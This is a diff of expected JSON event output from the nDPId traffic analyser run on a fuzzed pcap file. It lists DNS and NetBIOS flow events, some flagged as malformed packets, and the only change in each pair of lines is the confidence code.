-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1120471067211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120471067211,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF0AAIARSfDAqAECwKgB\/wALAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1120471068711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120471068711,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF8AAIARSe4+qAECwKgB\/wCJAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNNQAgAAE="} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1120471077370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471077370,"pkt":"ADBUADRWAODtAW69CABFAABIbGAAAIARSvHAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1120471078365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABIbGEAAIARSvDAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471080368} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABjbGIAAIARSu\/AqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3muZXJjaXR5AmRrAAAhAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1120471082371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471082371,"pkt":"ADBUADRWAODtAW69CABFAABIbGMAAIARSu7AqDYCwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcCVzAHAJY2liZXJjaXR5AmRrAAAhAAE="} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1120471084097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471084097,"pkt":"ADBUADQ1AODtAW69CABFAAA+bGQAAIARSvfAqAECwKgBAQsOADUAKohoTTQBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAQQEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1120471085095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471085095,"pkt":"JDBUADRWAODtAW69CABFAAA+bGUAAIARSvbAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1120471086377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471086377,"pkt":"ADBUADRWAODtAW69CABFAABIbGYAAIARSut0qAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1120471087098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471087098,"pkt":"ADBUADRWAODtAW69CABFAAA+bGcAAIARSvTAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 